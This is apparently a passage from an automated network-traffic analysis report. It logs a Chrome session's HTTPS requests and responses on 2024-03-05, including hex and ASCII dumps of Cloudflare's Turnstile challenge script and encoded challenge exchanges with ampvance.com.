                                                      2024-03-05 13:24:35 UTC427OUTData Raw: 5b 7b 22 61 67 65 22 3a 37 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 37 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 66 70 63 65 72 74 73 74 72 65 61 6d 2e 63 61 73 74 6c 65 68 69 6c 6c 69 6e 66 6f 74 65 63 68 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 31 2e 32 32 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e
                                                      Data Ascii: [{"age":7,"body":{"elapsed_time":679,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://rfpcertstream.castlehillinfotech.com/","sampling_fraction":1.0,"server_ip":"104.21.81.229","status_code":403,"type":"http.error"},"type":"n
                                                      2024-03-05 13:24:35 UTC168INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      date: Tue, 05 Mar 2024 13:24:35 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.549721104.17.2.1844433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:35 UTC581OUTGET /turnstile/v0/g/a0d8959cb7d0/api.js?onload=lDtWXt4&render=explicit HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://ampvance.com
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: script
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:35 UTC296INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:35 GMT
                                                      Content-Type: application/javascript; charset=UTF-8
                                                      Content-Length: 39035
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: max-age=31536000
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d597a226a5e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:35 UTC1073INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 2c 72 2c 74 2c 69 2c 66 2c 73 2c 67 29 7b 74 72 79 7b 76 61 72 20 76 3d 65 5b 73 5d 28 67 29 2c 79 3d 76 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 75 29 7b 74 28 75 29 3b 72 65 74 75 72 6e 7d 76 2e 64 6f 6e 65 3f 72 28 79 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 79 29 2e 74 68 65 6e 28 69 2c 66 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 69 2c 66 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                      Data Ascii: "use strict";(function(){function pt(e,r,t,i,f,s,g){try{var v=e[s](g),y=v.value}catch(u){t(u);return}v.done?r(y):Promise.resolve(y).then(i,f)}function vt(e){return function(){var r=this,t=arguments;return new Promise(function(i,f){var s=e.apply(r,t);funct
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 21 31 2c 67 2c 76 3b 74 72 79 7b 66 6f 72 28 74 3d 74 2e 63 61 6c 6c 28 65 29 3b 21 28 66 3d 28 67 3d 74 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 69 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 69 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 66 3d 21 30 29 3b 7d 63 61 74 63 68 28 79 29 7b 73 3d 21 30 2c 76 3d 79 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 66 26 26 74 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 74 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 73 29 74 68 72 6f 77 20 76 7d 7d 72 65 74 75 72 6e 20 69 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e
                                                      Data Ascii: !1,g,v;try{for(t=t.call(e);!(f=(g=t.next()).done)&&(i.push(g.value),!(r&&i.length===r));f=!0);}catch(y){s=!0,v=y}finally{try{!f&&t.return!=null&&t.return()}finally{if(s)throw v}}return i}}function yt(){throw new TypeError("Invalid attempt to destructure n
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 74 75 72 6e 29 26 26 73 2e 63 61 6c 6c 28 66 29 2c 30 29 3a 66 2e 6e 65 78 74 29 26 26 21 28 73 3d 73 2e 63 61 6c 6c 28 66 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 73 3b 73 77 69 74 63 68 28 66 3d 30 2c 73 26 26 28 75 3d 5b 75 5b 30 5d 26 32 2c 73 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 73 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 74 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 74 2e 6c 61 62 65 6c 2b 2b 2c 66 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 75 3d 74 2e 6f 70 73 2e 70 6f 70 28 29 2c 74 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b
                                                      Data Ascii: turn)&&s.call(f),0):f.next)&&!(s=s.call(f,u[1])).done)return s;switch(f=0,s&&(u=[u[0]&2,s.value]),u[0]){case 0:case 1:s=u;break;case 4:return t.label++,{value:u[1],done:!1};case 5:t.label++,f=u[1],u=[0];continue;case 7:u=t.ops.pop(),t.trys.pop();continue;
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 75 74 65 22 7d 29 28 4b 7c 7c 28 4b 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 5f 46 41 49 4c 53 3d 22 61 6c 77 61 79 73 2d 66 61 69 6c 73 22 2c 65 2e 53 4f 4d 45 54 49 4d 45 53 5f 46 41 49 4c 53 3d 22 73 6f 6d 65 74 69 6d 65 73 2d 66 61 69 6c 73 22 2c 65 2e 4b 45 45 50 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 55 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b
                                                      Data Ascii: ute"})(K||(K={}));var We;(function(e){e.ALWAYS_FAILS="always-fails",e.SOMETIMES_FAILS="sometimes-fails",e.KEEPS_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(We||(We={}));function ze(e){return U(["auto","dark","light"],e)}function He(e){
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 47 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 69 2c 66 29 7b 72 65 74 75 72 6e 20 69 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 66 2c 69 7d 2c 47 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 50 74 28 65 2c 72 29 7b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 72 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65
                                                      Data Ascii: lass as a function")}function G(e,r){return G=Object.setPrototypeOf||function(i,f){return i.__proto__=f,i},G(e,r)}function Pt(e,r){if(typeof r!="function"&&r!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Obje
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 66 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 47 28 66 2c 69 29 7d 2c 49 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 44 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 26 26 28 4c 28 72 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 72 3a 53 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 55 74 28 65 29 7b 76 61 72 20 72 3d 41 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 4a 28 65 29 2c 66 3b 69 66 28 72 29 7b 76 61 72 20 73 3d 4a 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 66 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74
                                                      Data Ascii: tructor:{value:f,enumerable:!1,writable:!0,configurable:!0}}),G(f,i)},Ie(e)}function Dt(e,r){return r&&(L(r)==="object"||typeof r=="function")?r:Se(e)}function Ut(e){var r=Ae();return function(){var i=J(e),f;if(r){var s=J(this).constructor;f=Reflect.const
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 3d 21 30 2c 69 3d 21 31 2c 66 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 73 3d 65 2e 77 69 64 67 65 74 4d 61 70 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 67 3b 21 28 74 3d 28 67 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 76 3d 62 65 28 67 2e 76 61 6c 75 65 2c 32 29 2c 79 3d 76 5b 30 5d 2c 75 3d 76 5b 31 5d 2c 62 3b 75 2e 77 61 74 63 68 63 61 74 2e 73 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 2c 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 3d 3d 30 26 26 28 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 29 3b 76 61 72 20 54 3d 58 28 79 29 3b 69 66 28 21 54 29 7b 75 2e 77 61 74 63 68 63 61
                                                      Data Ascii: =!0,i=!1,f=void 0;try{for(var s=e.widgetMap[Symbol.iterator](),g;!(t=(g=s.next()).done);t=!0){var v=be(g.value,2),y=v[0],u=v[1],b;u.watchcat.seq=e.watchCatSeq,u.watchcat.lastAckedSeq===0&&(u.watchcat.lastAckedSeq=e.watchCatSeq);var T=X(y);if(!T){u.watchca
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 69 66 28 69 29 74 68 72 6f 77 20 66 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 2c 72 29 7b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 72 28 65 2c 72 29 7d 2c 61 72 29 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 21 31 3b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 21 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 69 64 67 65 74 4d 61 70 2e 73 69 7a 65 3d 3d 3d 30 7c 7c 72 29 26 26 63 6c 65 61 72 49
                                                      Data Ascii: if(i)throw f}}}function Ze(e,r){e.watchCatInterval===null&&(e.watchCatInterval=setInterval(function(){or(e,r)},ar))}function et(e){var r=arguments.length>1&&arguments[1]!==void 0?arguments[1]:!1;e.watchCatInterval!==null&&(e.widgetMap.size===0||r)&&clearI
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 29 2c 69 3d 3d 6e 75 6c 6c 7c 7c 28 74 3d 69 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 7c 7c 74 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 67 2c 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 65 2e 5f 70 53 74 61 74 65 3b 72 65 74 75 72 6e 20 74 3f 28 72 2e 69 73 52 65 61 64 79 3d 74 2e 69 73 52 65 61 64 79 2c 72 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 3d 74 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 2c 72 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 3d 74 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 2c 72 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 3d 74 2e 73 63 72 69
                                                      Data Ascii: ),i==null||(t=i.parentNode)===null||t===void 0||t.replaceChild(g,i)}}function Ht(e,r){var t=e._pState;return t?(r.isReady=t.isReady,r.isRecaptchaCompatibilityMode=t.isRecaptchaCompatibilityMode,r.lastWidgetIdx=t.lastWidgetIdx,r.scriptWasLoadedAsync=t.scri
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 69 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 21 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 64 6a 62 32 3a 20 65 78 70 65 63 74 65 64 20 73 74 72 69 6e 67 2c 20 67 6f 74 20 22 2e 63 6f 6e 63 61 74 28 74 79 70 65 6f 66 20 65 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 4c 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 35 33 38 31 2c 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 69 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 3b 72 3d 72 2a 33 33 5e 69 7d 72 65 74 75 72 6e 20 72 3e 3e 3e 30 7d 76 61 72 20 6f 65 3d 21 31 2c
                                                      Data Ascii: parentNode}return i.substring(0,t)}function Bt(e){if(typeof e!="string")throw new Error("djb2: expected string, got ".concat(typeof e=="undefined"?"undefined":L(e)));for(var r=5381,t=0;t<e.length;t++){var i=e.charCodeAt(t);r=r*33^i}return r>>>0}var oe=!1,


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.549722104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:35 UTC1048OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dc HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      Content-Length: 1836
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      CF-Challenge: a96d5f6b92698dc
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ampvance.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:35 UTC1836OUTData Raw: 76 5f 38 35 66 61 36 64 35 33 36 61 66 31 31 39 65 62 3d 64 36 69 59 42 59 6d 59 54 59 59 59 39 59 6f 79 25 32 62 71 79 2b 70 43 69 38 78 72 44 67 44 46 54 2b 7a 63 2b 78 4b 59 46 70 4d 2b 43 52 4b 77 36 78 44 75 69 2b 6f 2b 75 6e 49 78 72 2b 58 75 41 59 77 69 2b 55 2b 77 35 38 2b 6e 59 2b 36 54 50 44 59 6b 32 2b 75 6a 56 43 2b 57 66 63 59 2b 44 35 2b 75 36 4b 2b 49 59 77 73 64 4d 37 70 4b 46 6a 2b 77 43 77 41 66 2b 69 43 53 61 35 7a 4b 46 74 67 44 59 77 53 67 32 51 2b 65 6d 4d 54 5a 56 59 77 75 4d 54 77 68 44 73 42 6d 2b 7a 36 69 4b 59 77 5a 61 59 77 46 6e 6b 2b 4b 61 69 36 2b 70 59 78 75 6a 6f 67 44 4d 59 75 68 4a 79 79 44 2d 79 2b 69 4a 77 59 4b 74 75 7a 4b 5a 41 71 70 41 51 36 43 52 78 51 2b 38 51 30 54 44 70 59 77 2b 51 6f 49 44 61 79 6c 2b 78 38 2b
                                                      Data Ascii: v_85fa6d536af119eb=d6iYBYmYTYYY9Yoy%2bqy+pCi8xrDgDFT+zc+xKYFpM+CRKw6xDui+o+unIxr+XuAYwi+U+w58+nY+6TPDYk2+ujVC+WfcY+D5+u6K+IYwsdM7pKFj+wCwAf+iCSa5zKFtgDYwSg2Q+emMTZVYwuMTwhDsBm+z6iKYwZaYwFnk+Kai6+pYxujogDMYuhJyyD-y+iJwYKtuzKZAqpAQ6CRxQ+8Q0TDpYw+QoIDayl+x8+
                                                      2024-03-05 13:24:35 UTC644INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:24:35 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: vwcbUT8tjVtN9WkPW2otUjUghfGURpJXAd4HqwxQ5eZ1nurqRJoVKzZhJ6bAmWAt$Nq/V/yTnBy4R+RuUzW8Pjg==
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZOS6o54cMqDWMFuZ9N7ykJ5pkYSkvASYwvs49L5jdkgyjYaqqhLUjCSbDfhisnwC5chQ7h0qHik%2B6QTjsZdokUke2NJIzWw1VNd8kdUMzpmyBVO4bfzyIIBSWGTsebU%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6d59ffff8c18-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:24:35 UTC725INData Raw: 33 34 61 38 0d 0a 66 32 74 36 5a 70 64 76 68 6e 61 65 6d 6f 35 72 6f 33 6c 77 66 6e 36 51 71 48 4b 46 68 48 56 6c 68 4b 35 35 61 59 61 50 67 58 36 4c 67 70 57 78 6a 59 75 58 69 71 75 50 6e 5a 61 4c 6a 4d 4f 54 6c 36 43 67 71 4a 65 62 79 4d 69 39 6e 34 2f 53 6b 35 4f 73 6f 64 58 59 78 74 43 78 31 72 57 5a 74 4e 54 59 34 62 36 77 74 75 50 5a 32 37 53 7a 76 73 43 34 77 4f 62 44 36 65 6e 6a 33 4c 4c 32 38 2f 48 44 38 76 50 6b 37 72 6e 49 31 2f 49 45 38 73 48 6d 78 50 72 37 32 2b 4c 42 76 67 7a 57 77 63 6f 42 79 66 48 69 36 77 38 41 36 74 58 6d 47 4f 2f 6f 35 79 44 7a 49 2f 77 6b 48 2f 6a 31 33 68 54 79 39 79 58 34 39 65 7a 34 2b 43 41 4f 42 79 44 7a 4d 53 45 4d 45 68 6b 74 4a 69 72 2b 44 78 67 5a 2f 45 49 74 46 79 49 2f 42 68 6b 69 42 55 67 37 49 31 45 38 53
                                                      Data Ascii: 34a8f2t6Zpdvhnaemo5ro3lwfn6QqHKFhHVlhK55aYaPgX6LgpWxjYuXiquPnZaLjMOTl6CgqJebyMi9n4/Sk5OsodXYxtCx1rWZtNTY4b6wtuPZ27SzvsC4wObD6enj3LL28/HD8vPk7rnI1/IE8sHmxPr72+LBvgzWwcoByfHi6w8A6tXmGO/o5yDzI/wkH/j13hTy9yX49ez4+CAOByDzMSEMEhktJir+DxgZ/EItFyI/BhkiBUg7I1E8S
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 75 68 49 53 6a 63 4a 43 53 73 4a 69 47 69 35 57 56 76 4b 36 66 72 71 43 64 67 5a 57 36 73 38 57 59 6f 70 79 2f 75 35 71 76 77 36 6a 43 71 36 65 31 6b 38 4f 38 6b 37 36 6f 34 4e 75 2b 7a 2b 4f 6a 33 72 7a 48 73 35 2f 67 32 64 69 35 71 64 72 6e 35 4e 50 6b 36 36 7a 78 38 4e 65 33 30 63 66 36 75 2b 76 48 31 37 72 43 74 51 50 38 77 77 51 44 35 64 33 6e 2f 51 44 68 2f 73 63 46 34 41 4d 43 79 39 37 6d 31 75 59 4b 42 76 54 71 44 64 37 75 45 68 54 5a 45 51 44 34 34 2f 49 42 39 41 6a 6e 41 2f 67 51 4d 51 59 4e 4b 6a 62 75 4a 78 67 76 45 68 63 37 46 52 59 79 49 52 34 32 4c 44 76 37 4e 2f 77 57 45 69 4d 43 50 79 34 6e 54 68 41 66 53 54 42 48 4e 6b 34 69 4d 42 4a 59 52 7a 55 78 53 55 42 50 55 30 6f 75 54 6c 4d 37 4d 6a 39 49 57 6a 52 47 57 46 31 75 52 32 77 36 53 32
                                                      Data Ascii: uhISjcJCSsJiGi5WVvK6frqCdgZW6s8WYopy/u5qvw6jCq6e1k8O8k76o4Nu+z+Oj3rzHs5/g2di5qdrn5NPk66zx8Ne30cf6u+vH17rCtQP8wwQD5d3n/QDh/scF4AMCy97m1uYKBvTqDd7uEhTZEQD44/IB9AjnA/gQMQYNKjbuJxgvEhc7FRYyIR42LDv7N/wWEiMCPy4nThAfSTBHNk4iMBJYRzUxSUBPU0ouTlM7Mj9IWjRGWF1uR2w6S2
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 6c 33 79 52 70 37 32 7a 6e 34 70 39 73 72 57 66 6f 73 43 35 73 35 62 4e 71 4c 32 46 70 37 44 4a 30 64 57 64 7a 39 4f 35 70 37 65 6c 70 4e 57 7a 32 64 2f 62 7a 37 2f 61 33 37 75 6d 33 36 62 54 33 75 72 4c 74 75 53 35 33 39 79 79 31 4e 58 41 2b 4c 54 31 35 74 54 64 74 50 54 48 79 37 6a 31 41 74 57 33 77 2f 6a 6a 32 64 33 38 79 41 59 47 37 77 76 4c 41 51 58 69 44 52 48 6a 31 4f 49 54 32 77 33 38 2f 50 73 4c 36 78 48 32 34 65 34 56 2b 2b 63 43 43 41 4c 6f 47 69 30 6f 4a 53 55 65 4a 75 34 30 39 51 6f 6e 4d 78 77 38 50 6a 6e 37 2b 42 77 38 46 6a 52 41 50 77 4d 45 43 54 67 63 4c 51 67 47 47 56 46 52 4d 55 73 72 54 42 5a 4c 4d 31 56 5a 4e 54 70 4a 4b 43 6f 74 59 46 41 64 54 78 34 76 5a 56 59 79 4e 54 4e 71 50 44 6b 33 49 6e 4a 68 61 47 49 2b 4c 33 46 68 59 32 78
                                                      Data Ascii: l3yRp72zn4p9srWfosC5s5bNqL2Fp7DJ0dWdz9O5p7elpNWz2d/bz7/a37um36bT3urLtuS539yy1NXA+LT15tTdtPTHy7j1AtW3w/jj2d38yAYG7wvLAQXiDRHj1OIT2w38/PsL6xH24e4V++cCCALoGi0oJSUeJu409QonMxw8Pjn7+Bw8FjRAPwMECTgcLQgGGVFRMUsrTBZLM1VZNTpJKCotYFAdTx4vZVYyNTNqPDk3InJhaGI+L3FhY2x
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 4c 33 42 65 38 61 69 6b 63 47 78 76 63 44 48 6c 34 36 46 75 73 79 37 77 37 37 47 6a 64 43 74 6f 36 53 6f 6c 4e 61 36 75 65 43 36 6c 4d 2b 78 70 5a 37 50 31 4e 76 54 34 75 48 4f 33 2b 65 77 70 2f 4b 71 30 71 33 42 37 4d 2f 75 31 2b 76 76 2b 73 7a 4e 30 37 2f 56 41 4e 54 56 34 41 6a 48 38 2b 58 46 36 73 6b 50 2b 4d 33 73 34 51 6a 66 37 2f 62 74 35 66 6a 73 31 2f 55 50 38 50 6b 55 38 50 6f 55 2f 69 51 54 46 42 34 56 39 64 33 6b 48 51 55 4d 35 77 67 50 4a 75 7a 73 42 53 34 46 4e 42 59 59 4f 42 45 32 46 68 4d 4f 2b 43 37 39 2b 7a 74 4a 4e 6b 6f 6e 53 68 67 64 52 45 68 52 4a 7a 77 54 45 6b 38 73 4b 6b 4e 46 46 51 35 58 57 7a 64 65 50 53 74 64 4d 52 77 66 4d 79 41 6d 49 45 6b 65 62 57 68 50 50 56 6f 76 62 48 46 52 51 33 4e 75 63 6a 49 32 64 32 68 35 64 57 70 52
                                                      Data Ascii: L3Be8aikcGxvcDHl46Fusy7w77GjdCto6SolNa6ueC6lM+xpZ7P1NvT4uHO3+ewp/Kq0q3B7M/u1+vv+szN07/VANTV4AjH8+XF6skP+M3s4Qjf7/bt5fjs1/UP8PkU8PoU/iQTFB4V9d3kHQUM5wgPJuzsBS4FNBYYOBE2FhMO+C79+ztJNkonShgdREhRJzwTEk8sKkNFFQ5XWzdePStdMRwfMyAmIEkebWhPPVovbHFRQ3NucjI2d2h5dWpR
